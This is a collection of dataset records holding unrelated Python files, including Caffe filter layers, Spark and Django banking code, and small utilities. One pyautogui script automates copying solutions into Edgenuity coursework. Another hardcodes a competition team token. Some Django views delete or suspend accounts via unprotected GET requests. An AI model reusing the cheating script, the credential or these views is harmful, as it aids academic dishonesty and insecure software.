{}'.format(ip[i]))\n print('IP must be integer with \".\" between octett.')\n main()\n elif int(ipx) <= int(255) and not ipx.isalpha():\n if len(ip) == 4:\n pass\n else:\n print('RESTART: IP address too short.')\n main()\n else:\n print('RESTART: Error with octett {}'.format(ip[i]))\n main()\n except:\n print('RESTART: General error with Net IP. 
Verify entry is correct.')\n main()\n\n\ndef pre_process(input_network, input_mask, n_nets): # Apply required codecs, then write fundamental database.\n input_user_db = []\n\n net_mask_array = return_mask_normalized(input_mask)\n net_cidr = return_cidr_normalized(input_mask)\n input_user_db.append(n_nets)\n input_user_db.append([int(i) for i in input_network.split('.')])\n input_user_db.append(net_mask_array)\n input_user_db.append(net_cidr)\n return input_user_db\n\n\ndef init_input(): # Recieve user input and validate\n input_network = input('What is the network IPv4 address: ')\n ip_code = validate_ip(input_network)\n if ip_code is None:\n pass\n else:\n print('RESTART: ERROR CODE: {}'.format(ip_code))\n main()\n return input_network\n\n\ndef mask_input(input_net): # Recieve user input for mask & Network data. Validate.\n input_labels_db = []\n# Mask input\n input_mask = input('What is the mask (255.255.255.192) or CIDR (/24): ')\n n_nets = int(input('Number of subnets required: '))\n input_user_db = pre_process(input_net, input_mask, n_nets)\n for b in range(0, n_nets):\n# Network input\n name_sub_net = input('Network ' + str(b) + ' Common Name: ')\n try:\n n_hosts = int(input('Number of hosts required: '))\n if n_hosts <= int(4): # Math doesn't work for int less than 4 / Must account for net_add, sub_broad, and a minimum of two hosts within network.\n print('INPUT UPDATE: Minimum host is 4. Must account for net_add, sub_broad, and a minimum of two hosts within network.')\n n_hosts = int(4)\n new_entry = [name_sub_net, n_hosts]\n input_labels_db.append(new_entry)\n input_labels_db = sorted(input_labels_db, key=lambda x: x[1], reverse=True)\n except:\n print('INPUT IGNORE: Value must be an integer.') # Data validation is go/no-go for integer\n name_sub_net = str('IGNORED SUBNET')\n n_hosts = int(4)\n new_entry = [name_sub_net, n_hosts]\n input_labels_db.append(new_entry)\n input_labels_db = sorted(input_labels_db, key=lambda x: x[1], reverse=True)\n pass\n return input_user_db, input_labels_db\n\n\nif __name__ == '__main__':\n main()\n","sub_path":"design/powershell/sub.py","file_name":"sub.py","file_ext":"py","file_size_in_byte":13198,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"72"} +{"seq_id":"29088598","text":"#!/usr/bin/python\n# -*- coding: utf-8 -*-\n# @Time : 2020/3/10 下午5:15\n# @Author : Aries\n# @Site :\n# @File : word2vec.py\n# @Software: PyCharm\nfrom gensim.models import KeyedVectors\nimport numpy as np\n\n\ndef main():\n\tpath = '/Users/houruixiang/python/data/Tencent_AILab_ChineseEmbedding/Tencent_AILab_ChineseEmbedding.txt'\n\t# 加载腾讯AILab词向量\n\tword2vec_text = KeyedVectors.load_word2vec_format(path, binary=False)\n\t# np.save('./models/word2vec.npy', word2vec_text)\n\n\nif __name__ == '__main__':\n\tmain()\n","sub_path":"word2vec.py","file_name":"word2vec.py","file_ext":"py","file_size_in_byte":522,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"72"} +{"seq_id":"406976942","text":"import csv\nimport os\nimport pandas as pd\nimport numpy as np\n\n\n# 获取当前目录下的CSV文件名\nfilepaths = []\nfor info in os.listdir('E:\\\\references\\\\COVID-19-master\\\\COVID-19-master\\\\csse_covid_19_data\\\\csse_covid_19_daily_reports_us'):\n domain = os.path.abspath(r'E:\\\\references\\\\COVID-19-master\\\\COVID-19-master\\\\csse_covid_19_data\\\\csse_covid_19_daily_reports_us')\n #获取文件夹的路径\n filepath = os.path.join(domain,info) #将路径与文件名结合起来就是每个文件的完整路径\n filepaths.append(filepath)\nprint(filepaths)\n\nneeded = 
[]\nfor path in filepaths:\n    df = pd.read_csv(path,header=0,index_col=0)\n    print(df['People_Hospitalized']['New York'])\n    needed.append(df['People_Hospitalized']['New York'])\nprint(needed)\nneeded = pd.DataFrame(needed)\nneeded.to_csv('E:\\\\references\\\\COVID-19-master\\\\COVID-19-master\\\\csse_covid_19_data\\\\csse_covid_19_daily_reports_us'+'//'+'hospital.csv',index=False)\n\n\n","sub_path":"get_data_csv.py","file_name":"get_data_csv.py","file_ext":"py","file_size_in_byte":951,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"72"} +{"seq_id":"332528187","text":"#!/usr/bin/env python\n\n\nimport numpy as np\nimport caffe\nimport yaml\nfrom fast_rcnn.nms_wrapper import nms\nfrom fast_rcnn.bbox_transform import bbox_transform_inv\nfrom fast_rcnn.config import cfg\n\n\nclass PythonFilterLayer(caffe.Layer):\n\n    def setup(self, bottom, top):\n        try:\n            self.layer_params = yaml.load(self.param_str_)\n        except AttributeError:\n            self.layer_params = yaml.load(self.param_str)\n        except:\n            raise\n        self.cfg_key = 'TRAIN' if self.phase == 0 else 'TEST'\n\n    def reshape(self, bottom, top):\n        pass\n\n    def forward(self, bottom, top):\n        raise NotImplementedError\n\n    def backward(self, top, propagate_down, bottom):\n        pass\n\n\nclass NmsLayer(PythonFilterLayer):\n    '''\n    Assume the input is N x 5, where each row is of\n    [x1, y1, x2, y2, score]. Output a list of indices\n    indicating which positions to keep.\n    If a second bottom blob is provided, the first blob is regarded\n    as deltas whereas the second is the bbox to regress to. The\n    layer will perform `bbox_transform_inv` before nms.\n    '''\n\n    def setup(self, bottom, top):\n        super(NmsLayer, self).setup(bottom, top)\n        self.thresh = self.layer_params['thresh']\n\n    def forward(self, bottom, top):\n        # if not self.transformed:\n        #     keep = nms(bottom[0].data, self.thresh)\n        # else:\n        #     raise NotImplementedError\n        if len(bottom) == 1:\n            keep = nms(bottom[0].data, self.thresh)\n        else:\n            pred_bbox = bbox_transform_inv(bottom[1].data, bottom[0].data[:, :4])\n            # stack the regressed boxes and their scores column-wise into an N x 5 array\n            keep = nms(np.hstack((pred_bbox, bottom[0].data[:, -1:])), self.thresh)\n        top[0].reshape(len(keep))\n        top[0].data[...] = keep\n\n\nclass TopNLayer(PythonFilterLayer):\n    '''\n    Input is N x M, where one of the M columns is the scores\n    for each sample. Default is the last column. Specify\n    `score_column` to indicate which column should be regarded\n    as scores if not the last one.\n    If `reverse` is specified, take the bottom N targets instead\n    of top N.\n    '''\n\n    def setup(self, bottom, top):\n        super(TopNLayer, self).setup(bottom, top)\n        self.top_N = self.layer_params.get('top_N', cfg[self.cfg_key].RPN_BATCHSIZE)\n        self.score_column = int(self.layer_params.get('score_column', -1))\n        self.reverse = self.layer_params.get('reverse', False)\n        top[0].reshape(1)\n\n    def reshape(self, bottom, top):\n        pass\n\n    def forward(self, bottom, top):\n        top_N = min(self.top_N, bottom[0].shape[0])\n        top[0].reshape(top_N)\n        if len(bottom[0].shape) > 1:\n            keep = np.argsort(bottom[0].data[:, self.score_column])\n        else:\n            keep = np.argsort(bottom[0].data)\n        if not self.reverse:\n            keep = keep[::-1]\n        top[0].data[...] = keep[:top_N].squeeze()\n\n\nclass ThresholdLayer(PythonFilterLayer):\n    '''\n    Input is N x M, where one of the M columns is the scores\n    that thresholding should be applied to. 
Default is the last column.\n Specify `score_column` to indicate which column should be regarded\n as scores if not the last one.\n If `reverse` is specified as Ture, take the targets that are below\n the threshold instead of over it.\n '''\n\n def setup(self, bottom, top):\n super(ThresholdLayer, self).setup(bottom, top)\n self.thresh = self.layer_params['thresh']\n self.score_column = int(self.layer_params.get('score_column', -1))\n self.reverse = self.layer_params.get('reverse', False)\n assert self.score_column < bottom[0].shape[1]\n\n def forward(self, bottom, top):\n if not self.reverse:\n keep = np.where(bottom[0].data[:, self.score_column] > self.thresh)[0]\n else:\n keep = np.where(bottom[0].data[:, self.score_column] <= self.thresh)[0]\n top[0].reshape(keep.shape[0])\n top[0].data[...] = keep\n","sub_path":"lib/misc/filter_layer.py","file_name":"filter_layer.py","file_ext":"py","file_size_in_byte":3926,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"72"} +{"seq_id":"193615004","text":"# Databricks notebook source\n# MAGIC %sh wget https://raw.githubusercontent.com/erlacherDev/Blueshift-Databricks-Spark/master/Material%20de%20Apoio/Datasets/006%20-%20007/vgsales.csv\n# MAGIC mv vgsales.csv /dbfs/FileStore/vgsales.csv\n\n# COMMAND ----------\n\npath = \"FileStore/vgsales.csv\"\n\ngamesRDD = sc.textFile(path)\n\ngarbage = gamesRDD.first()\n\ngamesWithoutGarbageRDD = gamesRDD.filter(lambda x: x != garbage)\n\nheader = gamesWithoutGarbageRDD.first()\n\ngamesWithoutHeaderRDD = gamesWithoutGarbageRDD.filter(lambda x: x != header)\n\ngamesSplitedRDD = gamesWithoutHeaderRDD.map(lambda x: x.split(\"|\"))\n\n# COMMAND ----------\n\n(Name, Platform, Year, Publisher, Global_Sales) = range(5)\n\nbestGamesRDD = gamesSplitedRDD.filter(lambda x: float(x[Global_Sales]) > 5.00)\n\nbestGamesKeyByPublisherRDD = bestGamesRDD.keyBy(lambda x: x[Publisher])\n\n# COMMAND ----------\n\ncountBestGamesByPublisherRDD = bestGamesKeyByPublisherRDD.map(lambda x: (x[0], 1)).reduceByKey(lambda x,y: x+y)\n\n# COMMAND ----------\n\ncountSortedBestGamesByPublisherRDD = countBestGamesByPublisherRDD.sortBy(lambda x: float(x[1]), ascending=False)\n\n# COMMAND ----------\n\nrankedCountBestGamesByPublisher = countSortedBestGamesByPublisherRDD.zipWithIndex()\\\n.map(lambda x: (x[0][0], x[0][1], x[1]+1))\n\n# COMMAND ----------\n\nschema = \"Publisher string, Count int, Rank int\"\n\ndisplay(spark.createDataFrame(rankedCountBestGamesByPublisher, schema))\n\n# COMMAND ----------\n\ndisplay(rankedCountBestGamesByPublisher.toDF([\"Publisher\", \"Count\", \"Rank\"]))\n","sub_path":"Material de Apoio/007 - Advanced RDDs/Python - Pair RDDs.py","file_name":"Python - Pair RDDs.py","file_ext":"py","file_size_in_byte":1503,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"71"} +{"seq_id":"306505989","text":"import django_tables2 as tables\nfrom django_tables2.utils import A\n\nfrom . 
models import *\n\n\nclass UriTable(tables.Table):\n id = tables.LinkColumn()\n entity = tables.TemplateColumn(\n \"{{ record.entity }}\",\n orderable=True, verbose_name=\"related Entity\"\n )\n ent_type = tables.TemplateColumn(\n \"{{ record.entity.get_child_class }}\",\n orderable=False, verbose_name=\"Entity Type\"\n )\n\n class Meta:\n model = Uri\n sequence = ('id', 'uri')\n attrs = {\"class\": \"table table-responsive table-hover\"}\n","sub_path":"apis_core/apis_metainfo/tables.py","file_name":"tables.py","file_ext":"py","file_size_in_byte":607,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"71"} +{"seq_id":"171918521","text":"# -*- coding: utf-8 -*-\n\"\"\"\nSpyder Editor\n\nThis is a temporary script file.\n\"\"\"\n\nimport sys\narg = sys.argv\nmylist = list(enumerate(arg))\nfor i in mylist:\n print(' '.join([str(item) for item in i]))\n","sub_path":"exercices/090/solution.py","file_name":"solution.py","file_ext":"py","file_size_in_byte":201,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"71"} +{"seq_id":"329643281","text":"from conftest import db_steps\nfrom pages.django_pages.main_page import MainPage\nfrom pages.django_pages.login_page import LoginPage\nfrom pages.django_pages.admin_page import AdminPage\nfrom time import sleep\n\n\ndef test_group_create(browser):\n group_exist = db_steps.check_if_group_exist()\n if group_exist:\n db_steps.group_delete()\n print('Group deleted')\n db_steps.group_creation()\n main_page = MainPage(browser)\n main_page.open_base_page()\n main_page.open_login_page()\n login_page = LoginPage(browser)\n login_page.login_is_present()\n sleep(1)\n login_page.login_filling()\n admin_page = AdminPage(browser)\n admin_page.admin_is_present()\n sleep(1)\n admin_page.open_groups()\n sleep(1)\n admin_page.groups_is_present()\n admin_page.find_group_in_list()\n sleep(5)\n","sub_path":"tests/db_tests/test_group_creation.py","file_name":"test_group_creation.py","file_ext":"py","file_size_in_byte":824,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"62"} +{"seq_id":"336057127","text":"\n# coding: utf-8\n\nimport requests\n\ndef submit(filename):\n files = {'files': open(filename, 'rb')}\n\n data = {\n # user_id is your username which can be found on the top-right corner on our website when you logged in.\n \"user_id\": \"meta_z\",\n # your team_token.\n \"team_token\": \"65355b59c393aec8e71eaa3b1cdb70a5692e8a61816a37cde79a2bed49bba644\",\n \"description\": filename.split('/')[1], # no more than 40 chars.\n \"filename\": filename, # your filename\n }\n\n url = 'https://biendata.com/competition/kdd_2018_submit/'\n\n response = requests.post(url, files=files, data=data)\n\n print(response.text)\n\nif __name__ == '__main__':\n submit('results/submit_0503.csv')\n","sub_path":"utils/api_submit.py","file_name":"api_submit.py","file_ext":"py","file_size_in_byte":714,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"62"} +{"seq_id":"162968441","text":"import pyautogui as pag\nimport numpy as np\n\n\n# coord for different button placements for writing\nenter = (1097, 799)\nsolution = (805, 594)\nend_of_sol = (877, 602)\nentry_box = (809, 651)\n\n\ndef copy():\n pag.mouseDown(button='right')\n pag.sleep(0.5)\n pag.moveRel(100, 35)\n pag.mouseUp()\n\n\ndef paste():\n pag.moveTo(entry_box, duration=0.25)\n pag.sleep(0.5)\n pag.click()\n pag.mouseDown(button='right')\n pag.moveRel(50, 150)\n pag.mouseUp()\n\n\nfor x in 
range(15):\n pag.sleep(4.75) # 4.75 is optimal\n pag.moveTo(entry_box)\n pag.mouseDown(button='left')\n pag.moveRel(200, 100)\n pag.keyDown('delete')\n pag.keyUp('delete')\n pag.click(enter, duration=0.2)\n pag.moveTo(solution, duration=1)\n pag.mouseDown(button='left')\n pag.moveRel(10, 17)\n copy()\n paste()\n\n pag.click(enter, duration=0.25)\n\n\n\n\n# posXY = pag.position()\n# # feeds colors\n# while not (posXY[0] == 0):\n# posXY = pag.position()\n# print(posXY, pag.pixel(posXY[0], posXY[1]))\n","sub_path":"Auto Edgenuity.py","file_name":"Auto Edgenuity.py","file_ext":"py","file_size_in_byte":1003,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"62"} +{"seq_id":"218945687","text":"import numpy as np\nimport random\nimport mnist_loader as ml\nimport Digit_Identifier as DI\nimport matplotlib.pylab as plt\n\n\n\ntraining_data, validation_data, test_data = ml.load_data_wrapper()\n\nnetwork = DI.Neural_Network( [ 784 , 30 , 10 ] )\n\n\ne_c, e_acc, t_c, t_acc, = network.SGD( training_data, # Input training data\n 100, # Number of epochs\n 10, # Mini-batch size\n 0.1, # Eta\n lmbda = 5, # The regularisation parameter\n evaluation_data = test_data, # Use validation, test data or None\n monitor_evaluation_cost = True,\n monitor_evaluation_accuracy = True,\n monitor_training_cost = True,\n monitor_training_accuracy = True )\n# Note that the SGD function returns the evaluation_cost, evaluation_accuracy, training_cost, training_accuracy\n\nnetwork.save(\"Stored_Network\")\n\nfig = plt.figure( figsize = (5,5) )\nax_E = fig.add_subplot( 2 , 1 , 1 )\nax_C = fig.add_subplot( 2 , 1 , 2 )\n\nax_E.plot( e_acc , label = \"Evaluation Accuracy\" )\nax_E.plot( t_acc , label = \"Training Accuracy\" )\nax_E.legend()\n\nax_C.plot( e_c , label = \"Evaluation Cost\" )\nax_C.plot( t_c , label = \"Training Cost\" )\nax_C.legend()\n\nplt.show()\n\n# plt.plot(\n","sub_path":"Handwriting/Train.py","file_name":"Train.py","file_ext":"py","file_size_in_byte":1480,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"62"} +{"seq_id":"140297832","text":"# Leetcode 102. Binary Tree Level Order Traversal\n\n# Time Complexity : O(n) where n is the number of nodes \n\n# Space Complexity : \n# BFS :: O(n) where n is the number of nodes \n# DFS :: O(H) where H is the height of the tree\n\n# Did this code successfully run on Leetcode : Yes\n# Any problem you faced while coding this : No\n\n# Approach: BFS :: Use a Q to store the current nodes being processed, at every level pop the left most\n# node from the queue and add it to the temporary array for that level. Add its child nodes to the Q.\n# After every level append the temp array to result and return the result after all the nodes are out of Q.\n# DFS :: Using the result and current level being visited, if the size and level match add a new array\n# for the level in result. 
Add the current node's val to the array for the corresponding level\n\n# Your code here along with comments explaining your approach\n\n# Definition for a binary tree node.\n# class TreeNode:\n# def __init__(self, val=0, left=None, right=None):\n# self.val = val\n# self.left = left\n# self.right = right\n\n# BFS\nfrom collections import deque\nclass Solution:\n def levelOrder(self, root: TreeNode) -> List[List[int]]:\n if not root:\n return []\n result = []\n q= deque()\n q.append(root)\n \n while q:\n # temp array to collect the nodes at level\n temp = []\n \n for _ in range(len(q)):\n # At every level pop the left most in q and if it has child nodes add them to q\n node = q.popleft()\n temp.append(node.val)\n if node.left:\n q.append(node.left)\n if node.right:\n q.append(node.right)\n # After every level append the level nodes to result \n result.append(temp)\n # When the q is empty return the result\n return result\n\n\n# DFS\nclass Solution:\n def levelOrder(self, root: TreeNode) -> List[List[int]]:\n result = []\n if not root:\n return result\n self.__dfs(root,0,result)\n return result\n \n def __dfs(self,node,level,result):\n # Base\n if not node:\n return\n # If the level is visited first time, add a new array to store nodes for that level\n if level == len(result):\n result.append([])\n # Add the current node's value to corresponding level array in result \n result[level].append(node.val)\n self.__dfs(node.left,level+1,result)\n self.__dfs(node.right,level+1,result)","sub_path":"BT_level_order.py","file_name":"BT_level_order.py","file_ext":"py","file_size_in_byte":2628,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"62"} +{"seq_id":"73058803","text":"from django.shortcuts import render,get_object_or_404\nfrom django.views import View \nimport datetime\nfrom time import time\n\nfrom django.http import JsonResponse\nfrom django.contrib import messages\nfrom django.contrib.auth import views as auth_views\nfrom django.shortcuts import render, redirect\nfrom django.contrib.auth.mixins import LoginRequiredMixin\n\nfrom branchs.models import OCSSC_branch_office\nfrom .models import User,Customer,SavingType,BankingHistory,AccountNumber\nfrom loan.models import Loan_processing\nfrom .forms import (FrontLoginForm,UserCreationForm,AbstractUserCreationForm,\n\t\t\t\tUserCreationUpdateForm,CustomerForm,CustomerEditForm,SavingsTypeForm\n\t\t\t\t,TransactForm)\n\n# Login view for the front end/customer user\nclass LoginView(auth_views.LoginView):\n form_class = FrontLoginForm\n template_name = 'registration/login.html'\n\n\nclass Transact(LoginRequiredMixin,View):\n\tdef get(self,*args,**kwargs):\n\t\tcustomer = Customer.objects.get(id=self.kwargs['id'])\n\t\tform= TransactForm()\n\t\tcontext = {\"form\":form,\"customer\":customer}\n\t\ttemplate_name = \"Transact/transact.html\"\n\t\treturn render(self.request, template_name,context)\n\tdef post(self,*args,**kwargs):\n\t\tform = TransactForm(self.request.POST)\n\t\tcustomer = Customer.objects.get(id=self.kwargs['id'])\n\t\ttemplate_name = \"Transact/transact.html\"\n\t\tif form.is_valid():\n\t\t\tif(form.cleaned_data.get('transaction') == \"Deposit\"):\n\t\t\t\tfinal_value = float(customer.initial_deposit)+float(form.cleaned_data.get('amount'))\n\t\t\t\tprint(final_value)\n\t\t\t\tprint(\"Deposited\") \n\t\t\tif(form.cleaned_data.get('transaction') == \"Withdrow\"):\n\t\t\t\tfinal_value = 
float(customer.initial_deposit)-float(form.cleaned_data.get('amount'))\n\t\t\t\tprint(final_value)\n\t\t\t\tprint(\"Withdraw\")\n\t\t\ttransact = BankingHistory( customer = customer,\n\t\t\t\t\t \tinitial_value = customer.initial_deposit,\n\t\t\t\t\t \t amount = form.cleaned_data.get('amount'),\n\t\t\t\t\t \t final_value = final_value ,\n\t\t\t\t\t \t transaction = form.cleaned_data.get('transaction'),\n\t\t\t\t\t \t transation_handler = self.request.user)\n\t\t\ttransact.save()\n\t\t\tprint(\"1\")\n\t\t\tcustomer.initial_deposit = final_value\n\t\t\tprint(\"2\")\n\t\t\tcustomer.save()\n\t\t\treturn redirect(\"transaction_list\")\n\t\t# re-render the page when the submitted form is invalid\n\t\tcontext = {\"form\": form, \"customer\": customer}\n\t\treturn render(self.request, template_name, context)\nclass Transaction_list(LoginRequiredMixin,View):\n\tdef get(self,*args,**kwargs):\n\t\ttransact = BankingHistory.objects.all()\n\t\tcontext = {\"banking\":transact}\n\t\ttemplate_name = \"Transact/list.html\"\n\t\treturn render(self.request, template_name, context)\n\nclass SavingsTypeDelete(LoginRequiredMixin,View):\n\tdef get(self,*args,**kwargs):\n\t\tsavings = SavingType.objects.get(id=self.kwargs['id'])\n\t\tsavings.delete()\n\t\tprint(\"Deleted Savings Type\")\n\t\treturn redirect('savings')\nclass SavingsType(LoginRequiredMixin,View):\n\tdef get(self,*args,**kwargs):\n\t\tform = SavingsTypeForm()\n\t\tcontext = {\"form\":form}\n\t\ttemplate_name = \"savings/create.html\"\n\t\treturn render(self.request, template_name,context)\n\tdef post(self,*args,**kwargs):\n\t\tsavings = SavingsTypeForm(self.request.POST)\n\t\tif savings.is_valid():\n\t\t\tsavings.save()\n\t\t\treturn redirect(\"savings\")\n\t\tcontext = {\"form\":savings}\n\t\ttemplate_name = \"savings/create.html\"\n\t\treturn render(self.request, template_name,context)\n\nclass SavingsTypeList(LoginRequiredMixin,View):\n\tdef get(self,*args,**kwargs):\n\t\tsavings = SavingType.objects.all()\n\t\tcontext = {\"savings\":savings}\n\t\ttemplate_name = \"savings/list.html\"\n\t\treturn render(self.request, template_name,context)\nclass CustomerList(LoginRequiredMixin,View):\n\tdef get(self,*args,**kwargs):\n\t\tcustomer = Customer.objects.all()\n\t\tprint(self.request.user.username)\n\t\tcontext = {\"Customers\":customer}\n\t\ttemplate_name = \"accounts/customer_list.html\"\n\t\treturn render(self.request, template_name,context)\n\nclass CustomerDetail(LoginRequiredMixin,View):\n\tdef get(self,*args,**kwargs):\n\t\ttry:\n\t\t\tcustomer = Customer.objects.get(id=self.kwargs['id'])\n\t\texcept Customer.DoesNotExist:\n\t\t\tcustomer = None\n\t\ttry:\n\t\t\ttest = Loan_processing.objects.get(customer=customer)\n\t\texcept Loan_processing.DoesNotExist:\n\t\t\ttest = None\n\t\tif test is not None:\n\t\t\tloan = True\n\t\telse:\n\t\t\tloan = False\n\t\ttry:\n\t\t\ttransact = BankingHistory.objects.filter(customer=customer)\n\t\texcept BankingHistory.DoesNotExist:\n\t\t\ttransact = None\n\t\tcontext = {\"form\":customer,\"loan\":loan,\"banking\":transact}\n\t\ttemplate_name = \"accounts/customer_detail.html\"\n\t\treturn render(self.request,template_name,context)\nclass CustomerEdit(LoginRequiredMixin,View):\n\tdef get(self,*args,**kwargs):\n\t\tcustomer = Customer.objects.get(id=self.kwargs['id'])\n\t\tbranchs = OCSSC_branch_office.objects.all()\n\t\tsavings = SavingType.objects.all()\n\t\tcontext = {\"form\":customer,\"branchs\":branchs,\"savings\":savings}\n\t\ttemplate_name = \"accounts/customer_edit.html\"\n\t\treturn render(self.request,template_name,context)\n\tdef post(self,*args,**kwargs):\n\t\tform = CustomerEditForm(self.request.POST,self.request.FILES)\n\t\tcustomer = 
Customer.objects.get(id=self.kwargs['id'])\n\t\tif form.is_valid():\n\t\t\tcustomer.first_name = form.cleaned_data.get('first_name')\n\t\t\tcustomer.last_name = form.cleaned_data.get('last_name')\n\t\t\tcustomer.middle_name = form.cleaned_data.get('middle_name')\n\t\t\tcustomer.phone_number = form.cleaned_data.get('phone_number')\n\t\t\tcustomer.address = form.cleaned_data.get('address')\n\t\t\tcustomer.city = form.cleaned_data.get('city')\n\t\t\tcustomer.savings_type = SavingType.objects.get(id=self.request.POST['savings_type'])\n\t\t\tcustomer.office_branch = OCSSC_branch_office.objects.get(id=self.request.POST['office_branch'])\n\t\t\tif 'document' in self.request.FILES:\n\t\t\t\tcustomer.document = self.request.FILES['document']\n\t\t\tif 'photograph' in self.request.FILES:\n\t\t\t\tcustomer.photograph = self.request.FILES['photograph']\n\t\t\tif 'identification' in self.request.FILES:\n\t\t\t\tcustomer.identification = self.request.FILES['identification']\n\t\t\tcustomer.save()\n\t\t\treturn redirect(\"customer\")\n\t\tprint(form.errors)\n\t\tbranchs = OCSSC_branch_office.objects.all()\n\t\tsavings = SavingType.objects.all()\n\t\tcontext = {\"form\":customer,\"branchs\":branchs,\"savings\":savings}\n\t\ttemplate_name = \"accounts/customer_edit.html\"\n\t\treturn render(self.request,template_name,context)\n\nclass CustomerDelete(LoginRequiredMixin,View):\n\tdef get(self,*args,**kwargs):\n\t\tcustomer = Customer.objects.get(id=self.kwargs['id'])\n\t\tcustomer.delete()\n\t\tprint(\"Deleted customer\")\n\t\treturn redirect('customer')\nclass CustomerCreate(LoginRequiredMixin,View):\n\tdef get(self,*args,**kwargs):\n\t\tCustomer = CustomerForm()\n\t\ttemplate_name = \"accounts/customer_create.html\"\n\t\tcontext = {\"form\":Customer}\n\t\treturn render(self.request,template_name,context)\n\tdef post(self,*args,**kwargs):\n\t\tcustomer = CustomerForm(self.request.POST,self.request.FILES)\n\t\tif customer.is_valid():\n\t\t\tMainCustomer = Customer(\tfirst_name = customer.cleaned_data.get('first_name'),\n\t\t\t\tmiddle_name = customer.cleaned_data.get('middle_name'),\n\t\t\t\tlast_name = customer.cleaned_data.get('last_name'),\n\t\t\t\taccount_number = customer.cleaned_data.get('account_number'),\n\t\t\t\tinitial_deposit = customer.cleaned_data.get('initial_deposit'),\n\t\t\t\tphone_number = customer.cleaned_data.get('phone_number'),\n\t\t\t\tdocument = customer.cleaned_data.get('document'),\n\t\t\t\tphotograph = customer.cleaned_data.get('photograph') ,\n\t\t\t\tidentification = customer.cleaned_data.get('identification'),\n\t\t\t\taddress = customer.cleaned_data.get('address'),\n\t\t\t\tsavings_type = customer.cleaned_data.get('savings_type'),\n\t\t\t\tcity = customer.cleaned_data.get('city'),\n\t\t\t\toffice_branch = customer.cleaned_data.get('office_branch'),\n\t\t\t\tactive = True,\n\t\t\t\tcreated_by = self.request.user )\n\t\t\tMainCustomer.save()\n\t\t\treturn redirect(\"customer\")\n\n\t\ttemplate_name = \"accounts/customer_create.html\"\n\t\tcontext = {\"form\":customer}\n\t\treturn render(self.request,template_name,context)\n\nclass AccountList(LoginRequiredMixin,View):\n\tdef get(self,*args,**kwargs):\n\t\taccounts = User.objects.all()\n\t\tcontext = {\"accounts\":accounts}\n\t\ttemplate_name = \"accounts/account_list.html\"\n\t\treturn render(self.request, template_name,context)\nclass AccountDelete(LoginRequiredMixin,View):\n\tdef get(self,*args,**kwargs):\n\t\taccount = User.objects.get(id=self.kwargs['id'])\n\t\taccount.delete()\n\t\treturn redirect(\"account\") \n\nclass 
AccountSuspend(LoginRequiredMixin,View):\n\tdef get(self,*args,**kwargs):\n\t\taccount = User.objects.get(id=self.kwargs['id'])\n\t\tprint(\"--------\") \n\t\tprint(account.active)\n\t\tprint(\"--------\")\n\t\tif account.active == True:\n\t\t\taccount.active = False\n\t\t\taccount.save()\n\t\t\tprint(\"Print - 1 change\")\n\t\telse:\n\t\t\taccount.active = True\n\t\t\taccount.save()\n\t\t\tprint(\"Print - 1 change\")\n\t\treturn redirect(\"account\")\nclass AccountDetail(LoginRequiredMixin,View):\n\tdef get(self,*args,**kwargs):\n\t\taccount = User.objects.get(id=self.kwargs['id'])\n\t\tcontext = {\"form\":account,\"detail\":True}\n\t\ttemplate_name = \"accounts/account_create.html\"\n\t\treturn render(self.request, template_name, context)\n\nclass AccountEdit(LoginRequiredMixin,View):\n\tdef get(self,*args,**kwargs):\n\t\taccounts=User.objects.get(id=self.kwargs['id']) \n\t\tbranchs = OCSSC_branch_office.objects.all()\n\t\tposition = {('is_manager'), ( 'is_auditor'), ( 'is_customer_service'),( 'is_system_admin')}\n\t\tcontext = {\"form\":accounts,\"branchs\":branchs,\"position\":position}\n\t\ttemplate_name = \"accounts/account_edit.html\"\n\t\treturn render(self.request, template_name, context)\n\tdef post(self,*args,**kwargs):\n\t\taccounts=User.objects.get(id=self.kwargs['id'])\n\t\tform = UserCreationUpdateForm(self.request.POST,self.request.FILES)\n\t\tif form.is_valid():\n\t\t\taccounts.first_name = form.cleaned_data.get('first_name') \n\t\t\taccounts.last_name = form.cleaned_data.get('last_name')\n\t\t\taccounts.username = self.request.POST['username']\n\n\t\t\taccounts.phone_number = form.cleaned_data.get('phone_number')\n\t\t\taccounts.address = form.cleaned_data.get('address')\n\t\t\taccounts.city = form.cleaned_data.get('city')\n\n\t\t\tuser_type = self.request.POST['user_type']\t\t\t\n\t\t\taccounts.office_branch = form.cleaned_data.get('office_branch')\n\t\t\tif(user_type == \"is_manager\"):\n\t\t\t\taccounts.is_manager = True\n\t\t\t\taccounts.is_auditor = False\n\t\t\t\taccounts.is_customer_service = False\n\t\t\t\taccounts.is_system_admin = False\n\t\t\tif(user_type == \"is_auditor\"):\n\t\t\t\taccounts.is_auditor = True\n\t\t\t\taccounts.is_manager = False\n\t\t\t\taccounts.is_customer_service = False\n\t\t\t\taccounts.is_system_admin = False\n\t\t\tif(user_type == \"is_customer_service\"):\n\t\t\t\taccounts.is_customer_service = True\n\t\t\t\taccounts.is_auditor = False\n\t\t\t\taccounts.is_manager = False\n\t\t\t\taccounts.is_system_admin = False\n\t\t\tif(user_type == \"is_system_admin\"):\n\t\t\t\taccounts.is_system_admin = True\n\t\t\t\taccounts.is_auditor = False\n\t\t\t\taccounts.is_customer_service = False\n\t\t\t\taccounts.is_manager = False\n\n\t\t\tif 'qualification_document' in self.request.FILES:\n\t\t\t\taccounts.qualification_document = self.request.FILES['qualification_document']\t\t\n\t\t\tif 'photograph' in self.request.FILES:\n\t\t\t\taccounts.photograph = self.request.FILES['photograph']\n\t\t\tif 'identification' in self.request.FILES:\n\t\t\t\taccounts.identification = self.request.FILES['identification']\n\t\t\taccounts.save()\n\t\t\treturn redirect(\"account\")\n\t\tbranchs = OCSSC_branch_office.objects.all()\n\t\tposition = {('is_manager'), ( 